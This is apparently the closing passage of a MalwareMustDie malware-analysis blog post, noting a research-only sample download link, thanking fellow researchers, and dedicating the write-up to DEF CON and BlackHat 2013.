I attached the samples I gain for the research purpose only by security experts in here-->>[MediaFire]

#MalwareMustDie!

Additional:
I credit the wonderful support from all fellow researchers who help this analysis and MalwareMustDie project in general, we won't make it this far without all of you.

I dedicated this writing to the incoming event of DEF CON and BlackHat 2013, I am still struggling to figure how to attend it, hopefully I can make it, God knows how much I wanted to go and meet many good friends in there (believe me), is just my health and my tight day work schedule is an obstacle to overcome.. But if I can't make it I will surely go to DerbyCon this year.

Read More